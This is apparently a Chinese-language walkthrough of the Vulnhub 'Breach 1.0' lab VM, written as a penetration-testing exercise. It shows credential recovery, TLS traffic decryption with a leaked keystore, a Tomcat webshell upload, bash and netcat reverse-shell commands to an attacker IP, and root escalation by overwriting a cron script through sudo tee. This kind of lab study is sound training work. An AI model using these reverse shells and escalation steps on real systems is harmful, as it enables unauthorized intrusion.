Vulnhub靶場滲透練習(一) Breach1.0

 

 

打開靶場 固定ip須要更改虛擬機爲僅主機模式 192.168.110.140

打開網頁http://192.168.110.140/index.html

查看源代碼發現能夠加密字符串

猜想base64 解密  cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh  獲得這個結果多是二次加密在base64解密

獲得 pgibbons:damnitfeel$goodtobeagang$ta  去除：    獲得兩個字符串pgibbons，damnitfeel$goodtobeagang$ta

點擊圖片每一個路徑都看看發現

能夠登陸 把剛剛拿到的兩個密碼進行嘗試登陸

登陸成功 發現有3個郵件

192.168.110.140/.keystore   這個地址 爲 ssl 加密證書的密鑰庫   繼續搜索有用文件

 

 發現 有信息泄露 經過郵件信息猜想 tomcat 

發現  pcap 文件 爲 wireshark  流量包 能夠下載來分析

都是加密過的  能夠利用前面的ssl 解密  利用java 的 keytool 獲取證書  輸入

D:\jdk\bin>keytool.exe -list -keystore 

輸入密鑰庫口令:tomcat
密鑰庫類型: jks
密鑰庫提供方: SUN

您的密鑰庫包含 1 個條目

tomcat, 2016-5-21, PrivateKeyEntry,
證書指紋 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53

Warning:
JKS 密鑰庫使用專用格式。建議使用 "keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\jdk\keystore -deststoretype pkcs12" 遷移到行業標準格式 PKCS12。  

解密出來 結果

接着導出 p12 證書

輸入

keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

 

證書有了 咱們就能夠查看了 打開Wireshark  編輯--首選項--Protocols--SSL，點擊右邊的Edit：

 

輸入：192.168.110.140 8443 http 點擊選擇證書文件 輸入密碼tomcat

 

發現包含登陸用戶名密碼的數據包， 採用http basic認證，認證數據包爲： Basic

dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

這是base64編碼的用戶名密碼，將 dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 複製到Burpsuit Decoder進行解碼，

獲得Tomcat登陸用戶名密碼

Tomcat後臺登陸用戶名：tomcat，密碼：Tt\5D8F(#!*u=G)4m7zB

拿到密碼 後 能夠直接登陸

 

Tomcat 後臺是直接能夠獲取getshell 

 

這裏上傳馬之後每隔3分鐘會自動刪除 因此咱們直接利用他反彈一個shell 這裏能夠用linux 自帶的也能夠 用msf 生成

 echo "bash -i >& /dev/tcp/192.168.110.1/4444 0>&1" | bash

本機 輸入 nc.exe -lvp 4444

進入項目後直接能夠查看項目尋找到 兩個特殊文件

看到mysql 的用戶密碼

 

輸入 

mysql -u root -p  回車 密碼空 在回車

mysql -u root -p

use mysql;

select user,password from user;

exit

發現 milton 用戶   去 etc/passwd 

發現對應用戶 猜想就是這個用戶密碼 

到 https://www.somd5.com/ 解密，獲得用戶milton的明文密碼：thelaststraw

切換 su -milton   用戶

沒法執行su命令，顯示須要一個終端，以前都遇到這個問題，經過Python解決：

python -c 'import pty;pty.spawn("/bin/bash")'  

接着查詢這個用戶可否sudo   執行

sudo -l

沒發現可利用的   再重新找線索

uname -a 

系統內核版本爲：Linux Breach 4.2.0-27-generic，不存在Ubuntu本地提權漏洞。存在本地提權漏洞內核版本是：Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)

查找歷史命令發現

su提權到了blumbergh用戶。須要找到blumbergh用戶的密碼。將可用的資源文件下載發現

bill.png  底部是插入編碼 多是二次隱藏密碼  

tEXtComment  和coffeestains

利用這兩個嘗試登陸

登陸成功

用戶名：blumbergh 密碼：coffeestains

查sudo 權限

blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

可以以root 權限執行  

/usr/bin/tee /usr/share/cleanup/tidyup.sh

在去查看歷史命令

發現/usr/share/cleanup和tidyup.sh腳本文件：

執行 

cd / 
blumbergh@Breach:/$ cd usr
cd usr
blumbergh@Breach:/usr$ cd share
cd share
blumbergh@Breach:/usr/share$ cd cleasnup
cd cleasnup
-su: cd: cleasnup: No such file or directory
blumbergh@Breach:/usr/share$ cd cleanup
cd cleanup

 

cat tidyup.sh

 獲得

#!/bin/bash

#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

3分鐘刪除一次剛剛上馬的路徑

 剛剛看到 這個用戶可以執行tee 和 sh清除腳本

tee命令用於讀取標準輸入的數據，並將其內容輸出成文件。tidyup.sh是清理腳本。以root權限運行

這裏對linux 命令要解釋一下 

cat 文件或者 echo ""   | tee -a  文件（要寫到裏面的文件） -a 不是覆蓋是追加

所有咱們執行

echo "nc -e /bin/bash 192.168.110.1 5555"| sudo /usr/bin/tee  /usr/share/cleanup/tidyup.sh

 

cat 查看

等待nc 反彈 

 

成功 記得 python -c 'import pty;pty.spawn("/bin/bash")'  顯示終端